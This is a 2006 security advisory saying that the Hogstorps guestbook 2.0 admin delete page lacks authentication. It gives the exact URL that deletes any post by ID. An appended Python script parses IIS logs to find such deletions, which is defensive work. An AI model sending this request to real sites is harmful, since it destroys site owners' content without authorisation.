- Remote Access to Admin Panel without Authentication -
-= Hogstorps guestbook 2.0 =-
Omnipresent
May 04, 2006
Remote Access to Admin Panel without Authentication
Hogstorps guestbook 2.0
A free and simple guestbook.
The application is vulnerable to remote access to the admin panel without authentication.
A user can delete posts using only a simple string sent via the browser:
http://127.0.0.1/[path_of_application]/admin/radera/tabort.asp?delID=[Number_of_post]
Example: http://127.0.0.1/[path_of_application]/admin/radera/tabort.asp?delID=119
And you will receive the message:
The message is deleted, go back to guestbook!
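
For anyone reviewing a site that ran this guestbook, the following added example (not part of the original advisory) scans an IIS W3C extended log for successful requests to the delete script named above and lists the deleted post IDs per client. The log lines are constructed, and treating a missing admin-area Referer as a direct request is an assumption used for triage only.

```python
from collections import defaultdict
from urllib.parse import parse_qsl

# Script path as given in the advisory; the install prefix differs per site.
DELETE_SCRIPT = "/admin/radera/tabort.asp"

# Constructed sample in IIS W3C extended log format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2006-05-04 10:01:12 192.0.2.10 GET /gb/default.asp - 200 -
2006-05-04 10:02:40 192.0.2.10 GET /gb/admin/radera/tabort.asp delID=119 200 -
2006-05-04 10:02:44 192.0.2.10 GET /gb/admin/radera/tabort.asp delID=120 200 -
2006-05-04 11:15:03 198.51.100.7 GET /gb/admin/default.asp - 200 -
2006-05-04 11:15:20 198.51.100.7 GET /gb/admin/radera/tabort.asp delID=57 200 http://example.test/gb/admin/default.asp
2006-05-04 12:00:00 203.0.113.5 GET /gb/admin/radera/tabort.asp delID=abc 404 -
"""


def find_deletions(log_text):
    """Map client IP -> [(timestamp, delID, direct_hit)] for 2xx delete-script requests."""
    fields, hits = [], defaultdict(list)
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is declared by the log itself
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith(DELETE_SCRIPT):
            continue
        if not row.get("sc-status", "").startswith("2"):
            continue  # failed requests deleted nothing
        # ASP query-string keys are case-insensitive, so normalise them.
        query = {k.lower(): v for k, v in parse_qsl(row.get("cs-uri-query", ""))}
        if "delid" not in query:
            continue
        # Assumption: no Referer from the admin area means the URL was requested
        # directly. The header is client-controlled, so this is triage only.
        direct = "/admin/" not in row.get("cs(Referer)", "-").lower()
        when = f'{row.get("date", "?")} {row.get("time", "?")}'
        hits[row.get("c-ip", "?")].append((when, query["delid"], direct))
    return dict(hits)


if __name__ == "__main__":
    for ip, events in find_deletions(SAMPLE_LOG).items():
        for when, post_id, direct in events:
            print(ip, when, "delID=" + post_id, "DIRECT" if direct else "via admin page")
```
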
Aspcollection from Hogstorps IF
Not Informed!
omnipresent